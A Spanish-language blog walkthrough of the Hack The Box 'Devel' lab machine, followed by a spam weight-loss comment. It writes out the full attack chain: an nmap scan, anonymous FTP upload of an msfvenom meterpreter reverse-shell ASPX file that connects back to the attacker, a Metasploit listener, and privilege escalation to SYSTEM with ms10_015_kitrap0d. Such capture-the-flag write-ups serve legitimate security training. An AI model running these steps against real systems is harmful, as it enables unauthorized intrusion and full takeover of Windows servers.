HTB - Devel walkthrough -


    En este post les mostrare los pasos para completar el challenge devel de hack the box, el cual para mí me pareció muy bueno. Estoy practicando con maquinas Windows ya que quiero mejorar mis técnicas en estos OS debido a que hay mucho que aprender. Esta como veremos es bastante básica pero interesante a la vez, empecemos.

Enumeración 

Primero empezamos enumerando los puertos y servicios de nuestro objetivo. Para eso uso Nmap con el siguiente comando.

> nmap -sC -sV 10.10.10.5


Como podemos ver tenemos el puerto 21 abierto el cual esta corriendo el servicio FTP y este tiene habilitado el Anonymous log-in. A la vez nos muestra un directorio y varios archivos (al archivo sha4rk.aspx es de cuándo estaba haciendo la maquina). También vemos que tenemos el puerto 80 abierto corriendo IIS. 


Algo que note de la primera es que esta es la plantilla default que sale cuando corremos por primera vez nuestro server IIS, y si bien recordamos este archivo lo podemos ver en el FTP output junto con la imagen llamada welcome.png. Esto quiere decir que el servicio IIS esta ejecutando los archivos de ese directorio, por lo tanto podríamos intentar ejecutar una shell desde nuestro navegador. Para esto debemos crear una shell con la extension .aspx y intentar subirla mediante el servicio FTP.

Exploitation

Para crear nuestra shell usamos msfvenom de esta manera.

> msfvenom -p windows/meterpreter/reverse_tcp LHOST="Tu-Ip" LPORT="puerto de escucha" -f aspx -o sh4rk.aspx

Una vez tengamos nuestra reverse shell pasamos a conectamos por ftp con el user anonymous y un password random.


Usamos put junto al nombre de nuestra shell para subirla al servidor. Verificamos que esta haya subido y ahora pasamos a configurar nuestro listener con metasploit.

> msfconsole

>use multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp


Una vez configuremos nuestra ip y puerto de escucha vamos al navegador y ejecutamos nuestra shell.

>http://10.10.10.5/sh4rk.aspx

y como vemos en la imagen de arriba tendremos nuestra meterpreter.

Post-Exploitation

Ahora pasaríamos a intentar elevar privilegios para tener mayor control nuestra maquina víctima. En nuestra meterpreter corremos el comando backgound para dejar nuestra sección abierta. 

> search suggest


Cómo podemos ver el que nos interesa en este caso es el numero 3, ya que estamos buscando exploit de manera local en nuestra maquina. Vemos las opciones y solo nos pide la sección de nuestra meterpreter, en mi caso era la 2.


Una vez se me mostró esta lista antes de tirar balas locas (probarlos todos a lo loco) busque en mi navegador por el Id de cada una y la mas que me convenía en muestro caso era el ms10_015, ya este exploit nos abriría otra sesión como SYSTEM. en mi caso esta fue la que use.

use exploit/windows/local/ms10_015_kitrap0d


Bomm, si escribimos "whoami" podremos ver que ya somos system y solo faltaría pasar a leer los flags user.txt y root.txt.

Espero que les sea de ayuda este post, si quieren mas post sobre walkthrough solo comenten del nombre del challenge que desean. Compartan, para dudas y preguntas me escriben por Twitter.


1 comentario:

  1. Easy "water hack" burns 2 lbs OVERNIGHT

    Over 160 000 men and women are using a easy and secret "liquids hack" to drop 1-2 lbs every night while they sleep.

    It is very simple and works every time.

    This is how to do it yourself:

    1) Get a glass and fill it up with water half full

    2) Then learn this proven hack

    and be 1-2 lbs thinner in the morning!

    ResponderEliminar